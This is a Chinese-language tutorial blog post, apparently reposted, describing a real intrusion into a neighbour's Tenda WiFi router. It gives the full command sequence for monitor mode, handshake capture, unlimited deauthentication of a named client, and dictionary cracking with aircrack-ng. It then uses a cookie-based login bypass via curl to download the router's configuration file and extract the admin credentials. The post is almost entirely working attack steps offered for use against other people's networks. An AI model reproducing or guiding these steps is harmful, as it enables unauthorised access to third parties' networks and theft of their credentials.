獲取WiFi密碼


 

1.獲取WiFi密碼

首先我們要獲取WiFi密碼,需要用到一張無線網卡(本人用RT3070)、Aircrack-ng工具、密碼字典。

Aircrack-ng下載地址:http://www.aircrack-ng.org/

(1). sudo airmon-ng 查看自己的無線網卡接口名字,我的叫wlx983f9f182782

 

 

 

(2). sudo airmon-ng start wlx983f9f182782 開始監控自己的無線網卡,執行完這條命令后它會給你一個監控接口(這里是wlan0mon)

 

 

 

(3). sudo airodump-ng wlan0mon 截取隔壁家的wifi信號,今天我們要入侵的叫Tenda_243F00的路由器,它的bssid是C8:3A:35:24:3F:00,channel在10號

 

 

 

(4). sudo airodump-ng --bssid C8:3A:35:24:3F:00 -c 10 -w tenda wlan0mon 這條命令的意思是獲取這個指定路由的握手碼(里面含加密的WiFi密碼),獲取的數據將輸出到名為tenda的文件里(-w tenda,名字可以隨便改),現在可以下一步,進行下一步時這個窗口請暫時不要關閉

 

 

 

(5). sudo aireplay-ng -0 0 -a C8:3A:35:24:3F:00 -c 60:21:01:3B:03:71 wlan0mon 這條命令是偽裝成路由器發送請求給該路由器的用戶(60:21:01:3B:03:71這就是用戶),從而獲取握手碼(-0 后面的參數的指定次數,0為無限次),直到(4)的窗口右上角出現了handshake:C8:3A:35:24:3F:00(代表你已經獲取了加密過的密碼,下一步就是解密了),就能把所有窗口關閉

 

 

 

 

 

 

這個就是含有加密密碼的文件

 

 

 

(6). sudo aircrack-ng -w bir.txt tenda-01.cap 開始解密,請選用適合自己的一部字典,在這里我就選用了bir.txt這部字典,代表生日的意思,很多人的WiFi都喜歡用自己生日作為密碼。不夠兩秒鍾的時間,密碼就出現在我眼前了。由於是真實入侵的原因,我要把密碼屏蔽掉。

 

 

 

你現在可以使用這密碼成功登入WiFi了!

2. 現在是第二步,獲取控制權,能不能獲取到取決於你能不能發現這個路由的漏洞,本次例子是用騰達路由,我恰好在網上看到了關於他的漏洞的文章,入侵變得唾手可得了。

(1). 大部分的路由管理網面都在網段的最前面,比如192.168.0.1,192.168.1.1。這里我就不多說了,你可以用ifconfig命令查看下路由的網段。我這個例子是192.168.0.1

 

 

 

(2). 這個路由有個漏洞很搞笑,只要你加入cookie: admin:language=cn就能直接繞過后台登入,直接獲取管理員權限,我們馬上用curl發個請求去http://192.168.0.1/index.asp這個管理員頁面試試,“curl -H cookie:"admin:language=cn" http://192.168.0.1/index.asp”,果真能繞過登入界面獲取最高權限。好了,現在是重頭戲來了,既然我們獲取權限,我們就能拿到路由備份的管理員密碼,這個路由的備份在/cgi-bin/DownloadCfg/RouterCfm.cfg,我們試試“curl -H cookie:"admin:language=cn" http://192.168.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg | grep http”,最后,賬號和密碼都展現在了我們眼前。

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM